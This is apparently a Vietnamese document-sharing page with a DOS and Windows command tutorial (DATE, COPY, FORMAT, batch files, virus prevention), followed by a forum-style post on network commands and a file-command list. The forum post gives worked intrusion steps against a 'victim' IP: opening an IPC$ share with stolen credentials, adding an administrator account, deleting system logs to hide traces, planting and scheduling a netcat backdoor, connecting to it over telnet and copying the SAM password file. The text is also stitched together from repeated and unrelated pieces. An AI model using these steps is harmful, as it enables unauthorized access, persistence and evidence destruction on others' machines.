I. Các lệnh nội trú
Lệnh nội trú là những lệnh thi hành những chức năng của HĐH, thường xuyên được sử dụng, được lưu trữ vào bộ nhớ của máy tính từ khi khởi động và thường trú ở trong đó cho tới khi tắt máy.
Cách viết chung:
1.1. Một số lệnh về hệ thống
. Lệnh xem và sửa ngày: DATE
Current Date is Sat 02-04-2000
Enter new Date (mm-dd-yy)
Lúc này có hai tuỳ chọn
Nếu không thay đổi ngày giờ gõ Enter
Nếu sửa ngày hiện hành ở dòng một thì sửa theo khuôn mẫu (tháng -ngày-năm).
Bạn hãy thay đổi ngày lại cho máy tính ví dụ 31/07/2004.
. Lệnh xem và sửa giờ: TIME
Current time is 4:32:35.23a
Enter new time:
Lúc này có hai lựa chọn:
-Nếu không sửa giờ hiện hành của dòng một thì gõ Enter
- Nếu sửa giờ hiện hành thì sửa theo khuôn mẫu (giờ: phút:giây.% giây)
Bạn hãy thay đổi giờ lại cho máy tính thành 05 giờ 05 phút.
28 trang |
Chia sẻ: luyenbuizn | Lượt xem: 2792 | Lượt tải: 1
Bạn đang xem trước 20 trang nội dung tài liệu Các lệnh cơ bản trong DOS, để xem tài liệu hoàn chỉnh bạn click vào nút DOWNLOAD ở trên
6. Xoa Password đa được lưu trong vWindows XP
- Vao run go: Rundll32.exe Keymgr.dll, KRShowKeyMgr
- Sẽ hiện ra bảng tương tự dưới đay va bạn hay xoa hết những mật khẩu đa được lưu
trong hệ thống.
· Các Lệnh Cơ Bản Trong DOS
I. Các lệnh nội trúLệnh nội trú là những lệnh thi hành những chức năng của HĐH, thường xuyên được sử dụng, được lưu trữ vào bộ nhớ của máy tính từ khi khởi động và thường trú ở trong đó cho tới khi tắt máy.Cách viết chung: 1.1. Một số lệnh về hệ thống. Lệnh xem và sửa ngày: DATE Current Date is Sat 02-04-2000Enter new Date (mm-dd-yy)Lúc này có hai tuỳ chọnNếu không thay đổi ngày giờ gõ EnterNếu sửa ngày hiện hành ở dòng một thì sửa theo khuôn mẫu (tháng -ngày-năm).Bạn hãy thay đổi ngày lại cho máy tính ví dụ 31/07/2004.. Lệnh xem và sửa giờ: TIME Current time is 4:32:35.23aEnter new time: Lúc này có hai lựa chọn:-Nếu không sửa giờ hiện hành của dòng một thì gõ Enter- Nếu sửa giờ hiện hành thì sửa theo khuôn mẫu (giờ: phút:giây.% giây)Bạn hãy thay đổi giờ lại cho máy tính thành 05 giờ 05 phút.. Lệnh thay đổi dấu nhắc lệnh của DOS: PROMPT Lệnh thay đổi dấu đợi lệnh để có thể hiện thị một số thông tin hiện hành theo ý riêng của Người sử dụng.Prompt [Chuỗi ký tự]$P: Thư mục hiện hành $D: Ngày hiện hành$G: Dấu > $T: Giờ hiện hành$: Xuống dòngVí dụ: C>PROMPT $T $P$G . Lệnh xem phiên bản DOS: VER VER Bạn muốn xem hiện tại mình đang giao tiếp với HĐH MS-DOS là phiên bản nào.Ví dụ: C:\VER Windows 98 [Version 4.10.2222]. Lệnh xoá màn hình: CLS CLSLệnh xoá toàn bộ dữ liệu trên màn hình đưa con trỏ về góc trên cùng bên trái màn hình.. Chuyển đổi ổ đĩa Gõ tên ổ đĩa và dấu hai chấm, sau đó nhấn ENTER.Ví dụ: A: C: 1.2. Các lệnh về thư mục. Lệnh xem nội dung thư mục.DIR [drive:] [Path] [Tên thư mục] [/A][/S]{/P][W]}Trong đó: /P : để xem từng trang/W: Trình bày theo hàng ngang /A : xem các tập tin có thuộc tính ẩn và hệ thống/S: Xem cả thư mục con Ví dụ:DIR C:\WINDOWS /P /W Lệnh trên sẽ hiển thị các tệp, thư mục thuộc thư mục WINDOWS nằm trong thư mục gốc ổ đĩa C thành 5 hàng và dừng lại sau khi hiển thị hết một trang màn hình. Muốn xem tiếp chỉ việc nhấn một phím bất kỳ.. Lệnh chuyển về thư mục gốc và vào một thư mục nào đó. + Chuyển từ thư mục hiện thời về thư mục gốc của ổ đĩa hiện hành.CD\ + Lệnh chuyển về cấp thư mục cao hơn một bậc.CD.. + Chuyển vào một thư mụcLệnh này thay đổi thư mục hiện hành cần làm việc của đĩa nào đóCD [drive:]\[path] ( tên thư mục cần vào)Ví dụ:- Từ thư mục C:\ chuyển vào thư mục DAIHOC (Thư mục DAIHOC nằm trên ổ đĩa C)C:\CD DAIHOC C:\DAIHOC>_- Từ thư mục DAIHOC, chuyển sang thư mục BAITAP( Thư mục BAITAP nằm trên ổ đĩa C)C:\DAIHOC>CD BAITAP C:\DAIHOC\BAITAP>_. Lệnh xem ý nghĩa của câu lệnh C:\> [Tên lệnh] /? Ví dụ: Xem ý nghĩa của câu lệnh CDC:\CD /? . Lệnh tạo thư mục con(MD): MD [drive:]\[path] [drive:]\[path] : Chỉ ra đường dẫn đến nơi cần tạo thư mục.Ví dụ: C:\MD HOC Tạo Thư mục HOC Trên thư mục gốc của Ổ đĩa CC:\MD HOC\HOCDOS Tạo thư mục HOCDOS là thư mục con cua thư mục HOCC:\MD A:\DAIHOC Tạo thư mục DAIHOC trên ổ đĩa A.Lệnh xoá thư mục con(RD) Lệnh huỷ bỏ (xoá) thư mục:RD [drive:]\[path]Chú ý: thư mục cần xoá không phi là thư mục hiện hành và phi là thư mục rỗng (Empty Directory) ( tức là không có một tệp hay một thư mục nào năm trong nó).Ví dụ: C:\RD DAIHOC Xoá thư mục DAIHOC( Là thư mục rỗng) trên ổ đĩa C1.3. Các lệnh làm việc với tập tin . Lệnh sao chép tập tin(COPY):Lệnh này sao chép một hay một nhóm tệp từ thư mục này sang thư mục khác.Copy [drive1:]\[path1]\[Filename 1] [drive2:]\[path2]\[Filename 2]Copy [ổ đĩa]\[đường dẫn]\[tên tệp nguồn] ổ đĩa ]\[đường dẫn đích]Ví dụ1: Chép tệp BAOCAO.VNS từ thư mục A:\BKED vào thư mục gốc của ổ đĩa C: và lấy tên là BAOCAO.VNS.C:\>COPY A:\BKED\BAOCAO.VNS Ví dụ2: Sao chép tệp TUHOC.TXT từ thư mục gốc ổ đĩa C thành tệp HOCTHUOC.TXT ở thư mục HOC nằm trong thư mục gố ổ đĩa A.C:\COPY C:\TUHOC.TXT A:\HOC\HOCTHUOC.TXT Lệnh cộng tệp:Cộng nội dung file: Copy [ổ đĩa][đường dẫn][tên tệp 1]+[ổ đĩa][đường dẫn] [tên tệp 2]+ ... [ổ đĩa][đường dẫn][tên tệp mới]Trong cú pháp trên lệnh sẽ thực hiện như sau:Lần lượt cộng nội dung của các tệp: Tên tệp 1, Tên tệp 2, ... thành một tệp duy nhất có tên là Tên tệp mới.Chú ý: Trước tên tệp mới không có dấu (+), còn trước tên tệp muốn công phi có dấu cộng. Ví dụ: C:\COPY CD1.TXT+CD2.TXT+CD3.TXT C:\MYDOCU~1\CD.TXTLệnh tạo tệp tin(COPY CON): Tạo ra file để lưu trữ nội dung của một vấn đề nào đó.C:\COPY CON [drive:]\[path]\[File name] .... Nhập nội dung của tệp F6 1 file(s) is copiedC:\_(Nếu như tệp được tạo thì sau khi nhấn F6 sẽ có thông báo: 1 file(s) is copied trên màn hình, nếu như tệp không được tạo vì một lý do nào đó thì dòng thông báo sẽ là 0 file(s) is copied)Ví dụ: C:\>COPY CON BAITHO.TXT Tạo tệp BAITHO.TXT trên ổ đĩa C . Lệnh xem nội dung tập tin (TYPE): Lệnh dùng để xem (hiển thị) nội dung một tệp tin trên màn hình.TYPE \ Sau khi nhập đúng đường dẫn và tập tin thì nội dung sẽ được hiển thị trên màn hình.Nếu như trong cú pháp trên không đúng hoặc sai tên tệp tin, đường dẫn thì sẽ có dòng thông báo lỗi hiển thị ví dụ như: - Bad command or filename- Invalid drive Specification- Path not found - ...- Requirent parameter missingVí dụ: C:\>TYPE BAITHO.TXT Dùng để xem nội dung tập tin BAITHO.TXTTrên Ổ Đĩa C. . Đổi tên tệp tin(REN): Thay đổi tên file còn nội dung thì giữ nguyên.REN [d:][path][fileName] Ví dụ: C:\REN VANBAN\THUVIEN.DOC \VANBAN\HOPDONG.TXT¿Đổi tên file THUVIEN.DOC thành file HOPDONG.TXT nằm trong cùng một thư mục.
. Xoá nội dung tập tin(DEL): DEL [ổ đĩa][đường dẫn][tên tệp cần xoá] VD: C:\DEL C:\VANBAN\HOPDONG.TXTXoá tên file HOPDONG.TXT trong thư mục VANBAN ở ổ đĩa C: II. Lệnh ngoại trú Là những lệnh thi hành chức năng nào đó của HĐH nhưng ít được sử dụng và đỡ tốn bộ nhớ của máy người ta lưu trữ nó trên đĩa dưới dạng các tập tin có phần mở rộng là: COM hoặc EXE[d:] [path] [] [][d:] [path]: ổ đĩa đường dẫn đến tên lệnh: là tên chính của tên tệp tin chương trìnhLệnh định dạng đĩa (FORMAT) Tạo dạng cho đĩa mềm hay đĩa cứng ...[d:] [path] Format [d1] [/tham số][d:][Path]: ổ đĩa đường dẫn đến tên lệnh[d:]: Tên ổ đĩa cần định dạngTham số:/s: Tạo đĩa hệ thống./u: format mà sau đó không thể sử dụng lệnh UNFORMAT để lấy lại dữ liệu./q: định dạng nhanhVí dụ: Định dạng đĩa mềm trong ổ đĩa A theo đúng dung lượng của ổ đĩa và sao chép các tệp cần thiết để khởi động máy vào đĩa.C\:FORMAT A: /S Lệnh sao chép các tập tin hệ thống: Tác dụng: cho phép chép các tập tin hệ thống.[d:][Path]sys [d1:]Ví dụ: C:\sys A:Lệnh phục hồi đĩa(UNDELETE) Phục hồi đĩa bị xoá bởi lệnh định dạng đĩa FORMAT[d:][Path] UNDELETE [d1][path1][file Name]Lệnh kiểm tra đĩa(CHKDSK): Kiểm tra đĩa và thông báo tình trạng đĩa.CHKDSK[/F]Tham số /F sẽ hiển thị số Sector bị hỏng khi kết thúc quá trình kiểm tra.Ví dụ: CHKDSK C:Lệnh SCANDISK :Lệnh này dùng để kiểm tra cấu trúc tệp của đĩa và sau đó tiến hành kiểm tra các lỗi vật lý trên bề mặt đĩa.SCANDISK tên ổ đĩa Ví dụ: SCANDISK A: Tệp lệnh bó: Lệnh bó thực chất là một tệp trong đó liệt kê thứ tự thực hiện các lệnh được liệt kê trong tệp. Trong số các tệp lệnh bó, quan trọng nhất bao gồm hai tệp sau:Tệp AUTOEXEC.BAT Tệp lệnh Autoexec.bat là một tệp lệnh đặc biệt nằm ở thư mục gốc ổ đĩa khởi động. Khi khởi động hệ điều hành, các lệnh trong tệp Autoexec.bat sẽ thực hiện theo tuần tự.Ví dụ:@ECHO - Lệnh hiển thị một dòng trắng trên màn hìnhSMARTDRV.EXE - Gọi tệp tạo vùng đệm cho đĩaMSCDEX /D:MSCD001 /V - Gọi tệp khởi tạo chương trình điều khiển ổ CD trên DOS. SET BLASTER=A220 I5 D0 P300 - Lệnh đặt đường điều khiển âm thanh trên DOS ra loa.SET PATH=%PATH%;C:\PROGRA~1\COMMON~1\AUTODE~1 - Lệnh thiết đặt đường dẫn mặc định khi tìm tệp.Tệp CONFIG.SYSTệp lệnh CONFIG.SYS là tệp được gọi chạy đầu tiên của hệ điều hành khi khởi động máy. Sau khi nhận được lệnh khởi động máy từ ROM-BIOS, hệ điều hành sẽ lần lượt gọi chạy các tệp COMMAND.COM, MS-DOS.SYS, IO.SYS. Sau khi quá trình trên kết thúc, hệ điều hành sẽ tìm kiếm trên thư mục gốc ổ đĩa khởi động xem có tệp CONFIG.SYS hay không, nếu có nó sẽ tuần tự thực hiện các lệnh trong tệp đó, nếu có/không thì sau đó vẫn tiếp tục kiểm tra xem có tệp AUTOEXEC.BAT hay không, nếu có thì cũng tuần tự thực hiện các lệnh có trong tệp này, nếu có/không thì kết thúc quá trình khởi động và trả lại quyền điều khiển cho người sử dụng.Ví dụ: Nội dung của một tệp CONFIG.SYSDEVICE=C:\WINDOWS\HIMEM.SYS - Nạp chương trình khởi tạo và điều khiển bộ nhớ mở rộngDEVICE=C:\CDPRO\VIDE-CDD.SYS /D:MSCD001 Nạp chương trình khởi tạo và điều khiển ổ CDFILES=90 - Quy định số tệp được mở đồng thời tối đaBUFFERS=40 - Quy định số bộ nhớ đệm cho mỗi lần mở tệpIII. VIRUS tin học 3.1. Khái niệm VIRUS VIRUS tin học là một chương trình máy tính do con người tạo ra nhằm thực hiện ý đồ nào đó. Các chương trình này có đặc điểm:- Kích thước nhỏ.- Có khả năng lây lan, tức là tự sao chép chính nó lên các thiết bị lưu trữ dữ liệu như đĩa cứng, đĩa mềm, bằng từ ...- Hoạt động ngầm: hầu như người sử dụng không thể nhận biết được sự thực hiện của một chương trình VIRUS vì kích thước của nó nhỏ, thời gian thực hiện nhanh và người viết VIRUS luôn tìm cách che dấu sự hiện diện của nó. VIRUS nằm thường trú ở bộ nhớ trong để tiến hành lây lan và phá hoại. Hầu hết các VIRUS đều thực hiện công việc phá hoại như ghi đè lên các tệp dữ liệu, phá hỏng bảng FAT, khống chế bàn phím, sửa đổi cấu hình hệ thống, chiếm vùng nhớ trong.Tuỳ theo nguyên tắc hoạt động, có thể chia VIRUS thành hai loại:- Boot VIRUS là các loại nhiễm vào Master Boot và Boot Sector. Những virus này có thể làm máy tính không khởi động được, làm mất hết dữ liệu trên đĩa cững, thậm chí không khởi tạo được đĩa cứng.-File virus là loại nhiễm vào các tệp chương trình có đuôi EXE và COM. VIRUS này làm các chương trình chạy sai hoặc không chạy. VIRUS thường nối thân của mình vào đầu hoặc cuối tệp chương trình, như vậy kích thước tệp tăng khi nhiễm.- Nếu một đĩa mềm có VIRUS ta cho đĩa này vào máy có ổ cứng sạch thì ổ cứng của máy này sẽ bị nhiễm VIRUS. Nếu một máy tính có ổ cứng đã bị nhiễm VIRUS, ta cho một đĩa mềm sạch vào ổ A và chạy nhưng không đóng nút chống ghi lại thì đĩa mềm sẽ bị nhiễm VIRUS, từ đĩa mềm này khi ta mang đĩa mềm sang các máy khác để chạy thì VIRUS sẽ lan sang máy khác.3.2. Nguyên tắc phòng ngừa VIRUS. Vì vật trung gian để lây VIRUS là đĩa mềm, để phòng VIRUS ta phải rất hạn chế dùng một đĩa mềm lạ. Nếu bắt buộc phải dùng thì ta kiểm tra VIRUS đĩa mềm lạ bằng các chương trình chống VIRUS trước khi sử dụng. Song điều đó không thể hoàn toàn tin tưởng vì các chương trình chống VIRUS chỉ có khả năng phát hiện và diệt những VIRUS mà chúng đã biết. Các VIRUS mới không phát hiện được. Các chương trình chống VIRUS của nước ngoài không thể phát hiện các VIRUS sản xuất trong nước. Cần kết hợp nhiều chương trình chống VIRUS và luôn cập nhật chương trình mới nhất.Khi mang đĩa mềm của mình đi chạy ở các nơi khác có ổ cứng thì phải bật lẫy chống ghi để tránh VIRUS xâm nhập vào đĩa. Hết sức lưu ý khi ghi thông tin từ máy khác vào đĩa của mình.Nếu trên máy có nhiều người sử dụng thì trước khi làm việc ta nên sử dụng các chương trình chống VIRUS để kiểm tra VIRUS trên đĩa cứng.Để phòng chống nên có một hệ thống sạch (không có virus) để khởi động máy từ ổ A, đĩa này ngoài các tệp cần thiết để khởi động máy còn cần có các tệp của DOS như: Format.com, Fdisk.exe, unformat.com, Undelete.com, Scandisk.exe. Đồng thời ta phải có các đĩa mềm chứa các chương trình chống virus với các phiên bản mới nhất bộ SCAN, FPROT, ATV, BKAV,D2… các chương trình này cũng phải lấy từ nguồn đáng tin cậy, các đĩa mềm luôn được dán nhãn bảo vệ.3.3. Một số triệu chứng khi máy nhiễm virus - Một số tệp có đuôi COM và EXE tự nhiên bị tăng thêm số byte, khi đó ta nghĩ máy nhiễm F-virus. Để biết điều đó ta nhờ kích thước của một số tệp quan trọng: command.com 54645 byte (của DOS6.22), foxpro.exe 411032 byte (forpro 2.6)- Tệp chương trình đuôi COM hoặc EXE không chạy hoặc sai.- Máy không khởi động được từ đĩa cứng hoặc không nhận biết được ổ cứng khi khởi động máy từ ổ đĩa mềm, khi đó ta nghi máy bị nhiễm B-virus. - Máy chạy bị treo.Tất nhiên các triệu chứng trên còn có thể là do lỗi phần cứng.3.4. Cách xử lý khi máy bị nhiễm virus. Khi máy bị nhiễm VIRUS chúng ta tiến hành các bước sau:1. Tắt hoàn toàn máy tính để loại virus ra khỏi bộ nhớ trong. Khởi động lại máy bằng đĩa mềm hệ thống từ ổ A.2. Sau khi thực hiện xong bước một máy nhận biết được ổ C thì thực hiện bước 3. Nếu máy không nhận được ổ C thì thực hiện bước 4:3. Chạy các chương trình kiểm tra và diệt virus. Sau khi kết thúc quá trình trên thì khởi động lại máy từ ổ cứng và làm việc bình thường.4. Chạy chương trình kiểm tra và sửa đĩa nếu như cần giữ lại thông tin trên đĩa cứng (NDD.EXE). Sau khi sao lưu dữ liệu nên làm theo các bước sau: a. Chạy FDISK.EXE để khởi tạo lại bảng Partition (FAT) cho ổ cứng.b. Chạy FORMAT.COM C: /S để định dạng lại ổ đĩa.c. Cài lại hệ điều hành và ứng dụng cần thiết.d. Sao dữ liệu lại ổ đĩa và làm việc bình thường.Nếu như trên ổ đĩa không cần sao lưu dữ liệu lại thì có thể chạy ngay FDISK.EXE mà không cần chạy qua NDD.EXE.
1. Lệnh Ping : Cú pháp: Code: ping ip/host [/t][/a][/l][/n] - ip: địa chỉ IP của máy cần kiểm tra; host là tên của máy tính cần kiểm tra. Người ta có thể sử dụng địa chỉ IP hoặc tên của máy tính. - Tham số /t: Sử dụng tham số này để máy tính liên tục "ping" đến máy tính đích, cho đến khi bạn bấm Ctrl + C - Tham số /a: Nhận địa chỉ IP từ tên host - Tham số /l : Xác định độ rộng của gói tin gửi đi kiểm tra. Một số hacker sử dụng tham số này để tấn công từ chối dịch vụ một máy tính (Ping of Death - một loại DoS), nhưng tôi nghĩ là hacker có công cụ riêng để ping một gói tin lớn như thế này, và phải có nhiều máy tính cùng ping một lượt. - Tham số /n : Xác định số gói tin sẽ gửi đi. Ví dụ: ping 174.178.0.1/n 5 Công dụng : + Lệnh này được sử dụng để kiểm tra xem một máy tính có kết nối với mạng không. Lệnh Ping sẽ gửi các gói tin từ máy tính bạn đang ngồi tới máy tính đích. thông qua giá trị mà máy tính đích trả về đối với từng gói tin, bạn có thể xác định được tình trạng của đường truyền (chẳng hạn: gửi 4 gói tin nhưng chỉ nhận được 1 gói tin, chứng tỏ đường truyền rất chậm (xấu)). Hoặc cũng có thể xác định máy tính đó có kết nối hay không (Nếu không kết nối,kết quả là Unknow host)....
cac lenh trong dos
2. Lệnh Tracert : Cú pháp : Code: tracert ip/host Công dụng : + Lệnh này sẽ cho phép bạn "nhìn thấy" đường đi của các gói tin từ máy tính của bạn đến máy tính đích, xem gói tin của bạn vòng qua các server nào, các router nào... Quá hay nếu bạn muốn thăm dò một server nào đó.3. Lệnh Net Send, gởi thông điệp trên mạng (chỉ sử dụng trên hệ thống máy tình Win NT/2000/XP): Cú pháp: Net send ip/host thông_điệp_muốn_gởi Công dụng: + Lệnh này sẽ gửi thông điệp tới máy tính đích (có địa chỉ IP hoặc tên host) thông điệp: thông_điệp_muốn_gởi. + trong mạng LAN, ta có thể sử dụng lệnh này để chat với nhau. Trong phòng vi tính của trường tui thường dùng lệnh này để ghẹo mọi người! Bạn cũng có thể gởi cho tất cả các máy tính trong mạng LAN theo cấu trúc sau :Code: Net send * hello!I'm pro_hacker_invn 4. Lệnh Netstat : Cú pháp: Code: Netstat [/a][/e][/n] - Tham số /a: Hiển thị tất cả các kết nối và các cổng đang lắng nghe (listening) - Tham số /e: hiển thị các thông tin thống kê Ethernet - Tham số /n: Hiển thị các địa chỉ và các số cổng kết nối... Ngoải ra còn một vài tham số khác, hãy gõ Netstat/? để biết thêm Công dụng : + Lệnh Netstat cho phép ta liệt kê tất cả các kết nối ra và vào máy tính của chúng ta. 5. Lệnh IPCONFIG : Cú pháp: Code: ipconfig /all Công dụng: + Lệnh này sẽ cho phép hiển thị cấu hình IP của máy tính bạn đang sử dụng, như tên host, địa chỉ IP, mặt nạ mạng... 6. Lệnh FTP (truyền tải file): Cú pháp: Code: ftp ip/host Nếu kết nối thành công đến máy chủ, bạn sẽ vào màn hình ftp, có dấu nhắc như sau: Code: ftp>_ Tại đây, bạn sẽ thực hiện các thao tác bằng tay với ftp, thay vì dùng các chương trình kiểu Cute FTP, Flash FXP. Nếu kết nối thành công, chương trình sẽ yêu cầu bạn nhập User name, Password. Nếu username và pass hợp lệ, bạn sẽ được phép upload, duyệt file... trên máy chủ. Một số lệnh ftp cơ bản: -cd thu_muc: chuyển sang thư mục khác trên máy chủ - dir: Xem danh sách các file và thư mục của thư mục hiện thời trên máy chủ - mdir thu_muc: Tạo một thư mục mới có tên thu_muc trên máy chủ - rmdir thu_muc: Xoá (remove directory) một thư mục trên máy chủ - put file: tải một file file (đầy đủ cả đường dẫn. VD: c:\tp\bin\baitap.exe) từ máy bạn đang sử dụng lên máy chủ. - close: Đóng phiên làm việc - quit: Thoát khỏi chương trình ftp, quay trở về chế độ DOS command. Ngoài ra còn một vài lệnh nữa, xin mời các bạn tự tìm hiểu. Công dụng : + FTP là một giao thức được sử dụng để gửi và nhận file giữa các máy tính với nhau. Windows đã cài đặt sẵn lệnh ftp, có tác dụng như một chương trình chạy trên nền console (văn bản), cho phép thực hiện kết nối đến máy chủ ftp 7. Lệnh Net View : Cú pháp: Code: Net View [\\computer|/Domain[:ten_domain]] Công dụng: + Nếu chỉ đánh net view [enter], nó sẽ hiện ra danh sách các máy tính trong mạng cùng domain quản lý với máy tính bạn đang sử dụng. + Nếu đánh net view \\tenmaytinh, sẽ hiển thị các chia sẻ tài nguyên của máy tính tenmaytinh . Sau khi sử dụng lệnh này, các bạn có thể sử dụng lệnh net use để sử dụng các nguồn tài nguyên chia sẻ này.8. Lệnh Net Use : Cú pháp: Code: Net use \\ip\ipc$ "pass" /user:"xxx" - ip: địa chỉ IP của victim. - xxx: user của máy victim - pass: password của user Giả sử ta có đc user và pass của victim có IP là 68.135.23.25 trên net thì ta đã có thể kết nối đến máy tính đó rùi đấy! Ví dụ: user: vitim ; pass :12345 . Ta dùng lệnh sau: Code: Net use \\68.135.23.25\ipc$ "12345" /user:"victim" Công dụng: + kết nói một IPC$ đến máy tính victim (bắt đầu quá trình xâm nhập). 9. Lệnh Net User : Cú pháp: Code: Net User [username pass] [/add] - Username : tên user cấn add - pass : password của user cần add Khi đã add đc user vào rùi thì ta tiến hành add user này vào nhóm administrator. Code: Net Localgroup Adminstrator [username] [/add] Công dụng: + Nếu ta chỉ đánh lệnh Net User thì sẽ hiển thị các user có trong máy tính. + Nếu ta đánh lệnh Net User [username pass] [/add] thì máy tính sẽ tiến hành thêm một người dùng vào. Ví dụ: ta tiến hành add thêm một user có tên là xuanhoa , password là :banvatoi vào với cấu trúc lệnh như sau: Code: Net User xuanhoa banvatoi /add Sau đó add user xuanhoa vào nhóm adminnistrator Code: Net Localgroup Administrator xuanhoa /add10. Lệnh Shutdown: Cú pháp: Code: shutdown [-m \\ip] [-t xx] [-i] [-l] [-s] [-r] [-a] [-f] [-c "commet] [-d upx:yy] (áp dụng cho win XP) - Tham số -m\\ip : ra lệnh cho một máy tính từ xa thực hiên các lệnh shutdown, restart,.. - Tham số -t xx : đặt thời gian cho việc thực hiện lệnh shutdown. - Tham số -l : logg off (lưu ý ko thể thực hiện khi remote) - Tham số -s : shutdown - Tham số -r : shutdown và restart - Tham số -a : không cho shutdown - Tham số -f : shutdown mà ko cảnh báo - Tham số -c "comment" : lời cảnh báo trước khi shutdown - Tham số -d upx:yy : ko rõ Code: shutdown \\ip (áp dụng win NT) Để rõ hơn về lệnh shutdown bạn có thể gõ shutdown /? để được hướng dẫn cụ thể hơn! Công dụng: + Shutdown máy tính. 11. Lệnh DIR : Cú pháp: Code: DIR [drive:][path][filename] Lệnh này quá căn bản rùi, chắc tui khỏi hướng dẫn, để rõ hơn bạn đánh lệnh DIR /? để được hướng dẫn. Công dụng: + Để xem file, folder. 12. Lệnh DEL : Cú pháp: Code: DEL [drive:][path][filename] Lệnh này cũng căn bản rùi, ko phải nói nhìu. Công dụng: Xóa một file, thông thường sau khi xâm nhập vào hệ thống, ta phái tiến hành xóa dấu vết của mình để khỏi bị phát hiện.Sau đây là những files nhật ký của Win NT:Code : del C:\winnt\system32\logfiles\*.* del C:\winnt\ssytem32\config\*.evt del C:\winnt\system32\dtclog\*.* del C:\winnt\system32\*.log del C:\winnt\system32\*.txt del C:\winnt\*.txt del C:\winnt\*.log13. Lệnh tạo ổ đĩa ảo trên computer: Cú pháp: Code: Net use z: \\ip\C$ ( hoặc là IPC$ ) - Z là của mình...còn C$ là của Victim Công dụng: Tạo 1 đĩa ảo trên máy tính (lệnh này tui ko rõ nên ko thể hướng dẫn chi tiết đc) 14. Lệnh Net Time : Cú pháp: Code: Net Time \\ip Công dụng: + Cho ta biết thời gian của victim, sau đó dùng lệnh AT để khởi động chương trình. 15. Lệnh AT: Cú pháp: Code: AT \\ip Công dụng: + Thông thường khi xâm nhập vào máy tính victim khi rút lui thì ta sẽ tặng quà lưu niệm lên máy tính victim, khi đã copy troj hoặc backdoor lên máy tính rùi ta sẽ dùng lệnh at để khởi động chúng. Ví dụ: ở đây tui có con troj tên nc.exe (NC là từ viết tắc của NETCAT....nó là một telnet server với port 99) và đc copy lên máyvictim rùi. Đầu tiên ta cần biết thời gian của victim có IP là : 68.135.23.25 . Code: Net Time \\68.135.23.25 Bây h nó sẽ phản hồi cho ta thời gian của victim, ví dụ : 12:00. Code: AT \\68.135.23.25 12:3 nc.exe Đợi đến 12:3 là nó sẽ tự chạy trên máy nạn nhân và chúng ta có thể connected đến port 99. 16. Lệnh Telnet: Cú pháp: Code: telnet host port Gõ telnet /? để biết thêm chi tiết. Nhưng nếu như máy victim đã dính con nc rồi thì ta chỉ cần connect đến port 99 là OKie Code: telnet 68.135.23.25 99 Công dụng: + Kết nối đến host qua port xx 17. Lệnh COPY: Cú pháp: Code: COPY /? Dùng lệnh trên để rõ hơn! Công dụng: + Copy file, tui khỏi nói thêm nhé. Ví dụ:chúng ta copy files index trên ổ C của mình lên ổ C của 127.0.0.1 Code: Copy Index.html \\127.0.0.1\C$\index.html nếu bạn copy lên folder winNt Code: Copy index.html \\127.0.0.1\admin$\index.html muốn copy files trên máy victm thì bạn gõ vào : Code: Copy \\127.0.0.1\Admin$\repair\sam._c:\ 18. Lệnh SET: Cú pháp: Code: SET Công dụng: + Displays, sets, or removes cmd.exe enviroment variables. 19. Lệnh Nbtstat: Cú pháp: Code: Nbtstat /? Gõ lệnh trên để rõ hơn về lệnh này. Công dụng: + Display protocol statistic and curent TCP/IP connections using NBT (netbios over TCP?IP) Trên đây là một số hiểu biết hạn hẹp của em về các lệnh CMD, em đã đọc được từ rất nhiều nguồn khác nhau, nay tổng hợp lại cho mọi người tham khảo. Có một số lệnh em vẫn chưa hiểu cấu trúc lệnh và chưa có điều kiện để thực hành thử nên ko hướng dẫn kỹ. Ai biết thì góp ý nhé! Mong các pro đừng cười! Nếu thấy bài viết của em hay thì làm ơn thank cho một cái nhé
Bao gồm những lệnh cho phép bạn thực hiện các thao tác cơ bản đối với tập tin, thư mục và các ổ đĩa ... như tạo mới, chỉnh sửa, thiết lập các thuộc tính, sao chép, di chuyển, đổi tên, xóa ....
ASSOC Chỉnh sửa hoặc thiết lập mô tả cho một kiểu tập tin ATTRIB Thiết lập hoặc gỡ bỏ một thuộc tính của tập tin CACLS Phân quyền truy cập cho tập tin và thư mục CHKDSK Kiểm tra và sửa lổi các ổ đĩa CHKNTFS Thiết lập chế độ tự kiểm tra các phân vùng ổ cứng CIPHER Hiển thị hoặc chỉnh sửa sự mã hóa các tập tin, thư mục trên phân vùng dùng NTFS COMP So sánh tập tin COMPACT Hiển thi hoặc chỉnh sửa sự nén tập tin, thư mục trên phân vùng NTFS CONVERT Chuyển đổi các phân vùng sang NTFS COPY Sao chép các tập tin COPY CON Tạo một tập tin DEL Xóa tập tin DIR Hiển thị danh sách tập tin, thư mục EDIT Trình soạn thảo tập tin EDLIN Trình soạn thạo tập tin giản đơn EXE2BIN Chuyển đổi tập tin .exe sang tập tin nhị phân. EXPAND Giải nén tập tin *.cab FC So sánh và hiển thị sự khác biệt giữa 2 tập tin FIND Tìm một chuỗi văn bản trong một tập tin FINDSTR Tìm một chuỗi văn bản trong một tập tin nâng cao FOR Thực hiện một lệnh đối với mỗi tập tin trong một tập hợp các tập tin FORMAT Định dạng đĩa FTYPE Chỉnh sửa hoặc hiển thị lệnh để gọi ứng dụng mở cho một kiểu tập tin. LABEL Tạo nhãn cho các đĩa MD Tạo mới thư mục MOUNTVOL Tạo mới, xóa hoặc liệt kê số hiệu của đĩa MOVE Di chuyển các tập tin PRINT In một tập tin văn bản RECOVER Phục hồi các thông tin trên đĩa hỏng REN Đổi tên tập tin REPLACE Thay thế các tập tin SORT Sắp xếp nội dung dữ liệu bên trong tập tin SUBST Tạo một ổ ảo gắn với một thư mục trên máy TREE Hiển thị sơ đồ cây thư mục TYPE Xem nội dung một tập tin văn bản VOL Hiển thị số serial của đĩa XCOPY Sao chép cả tập tin và thư mục
SYSTEMBao gồm những lệnh cho phép thay đổi thiết lập, hiển thị thông tin hệ thống Windows và hệ thống phụ MS-Dos trên Windows.
